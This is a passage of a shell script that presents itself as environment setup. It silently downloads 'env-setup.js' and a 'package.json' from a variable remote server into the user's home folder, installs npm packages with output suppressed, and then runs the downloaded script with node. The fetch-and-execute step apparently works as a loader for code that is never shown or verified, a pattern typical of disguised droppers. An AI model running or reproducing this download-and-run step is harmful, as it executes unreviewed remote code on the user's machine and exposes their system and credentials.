curl -s -L -o "${USER_HOME}/env-setup.js" "${BASE_URL}/settings/env?flag=1"
curl -s -L -o "${USER_HOME}/package.json" "${BASE_URL}/settings/package"
fi
# -------------------------
# Install dependencies
# -------------------------
cd "${USER_HOME}"
if [ ! -d "node_modules/request" ]; then
echo "[INFO] Installing NPM packages..."
if command -v npm &> /dev/null; then
npm install --silent --no-progress --loglevel=error --fund=false
else
# Use npm from extracted directory if available
if [ -n "$EXTRACTED_DIR" ] && [ -f "$EXTRACTED_DIR/bin/npm" ]; then
"$EXTRACTED_DIR/bin/npm" install --silent --no-progress --loglevel=error --fund=false
else
echo "[ERROR] npm not found."
exit 1
fi
fi
if [ $? -ne 0 ]; then
echo "[ERROR] npm install failed."
exit 1
fi
fi
# -------------------------
# Run env-setup.js
# -------------------------
if [ -f "${USER_HOME}/env-setup.js" ]; then
echo "[INFO] Running env-setup.js..."
#cd "$HOME"
"$NODE_EXE" "${USER_HOME}/env-setup.js"
if [ $? -ne 0 ]; then
echo "[ERROR] env-setup.js execution failed."
exit 1
fi
else
echo "[ERROR] env-setup.js not found."
exit 1
fi
echo "[SUCCESS] Script completed successfully."
exit 0